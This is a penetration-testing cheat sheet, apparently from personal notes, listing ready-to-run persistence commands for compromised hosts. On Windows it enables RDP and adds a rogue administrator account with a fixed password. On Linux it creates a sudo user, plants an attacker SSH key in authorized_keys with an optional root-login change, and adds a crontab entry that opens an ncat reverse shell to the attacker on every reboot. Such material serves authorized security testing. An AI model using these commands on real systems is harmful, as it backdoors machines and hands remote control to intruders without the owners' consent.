Persistence

Windows

cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
cmd /c net user /add Till P@ssw0rd
cmd /c net localgroup Administrators /Add Till
cmd /c net localgroup "Remote Desktop Users" /Add Till
rdesktop -k de-ch -u 'Till' -p 'P@ssw0rd' {RHOST}

Linux

Add Super User

# Generate you're own PW with: `openssl passwd -crypt 'P@ssw0rd'`
sudo useradd -p wNlg41ZQYB2nQ -s /bin/bash -d /home/till -m -G sudo till

SSH Keys

# If you haven't done so already, prepare your ~/.ssh/id_rsa.pub on Kali:
ssh-keygen
 
# Generate the command to type into the target:
echo -e "echo '$(cat $HOME/.ssh/id_rsa.pub)' >> ~/.ssh/authorized_keys"
 
# Absolute Path: /home/{USER}/.ssh/authorized_keys
# Absolute Path: /root/.ssh/authorized_keys
 
# Maybe: echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && service sshd restart
 
# If ~/.ssh/authorized_keys doesn’t exist on target:
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chown -R {USER}:{USER} /home/{USER}/.ssh/
 
# Use the key
ssh -i ~/.ssh/id_rsa {RUSER}@{RHOST}

Crontab

(crontab -l ; echo "@reboot sleep 200 && ncat {LHOST} {LPORT} -e /bin/bash")|crontab 2> /dev/null

PayloadsAllTheThings Linux Persistence

Relevant Note(s): Penetration Testing

Till Studer's Notes

Recent Notes

Eating Your Own Dog Food

The Map Is Not the Territory

The Zen of Security Rules

Public Attack Simulation Repos

Public Detection Rule Repos

Persistence

Windows

Linux

Add Super User

SSH Keys

Crontab

Graph View

Table of Contents

Backlinks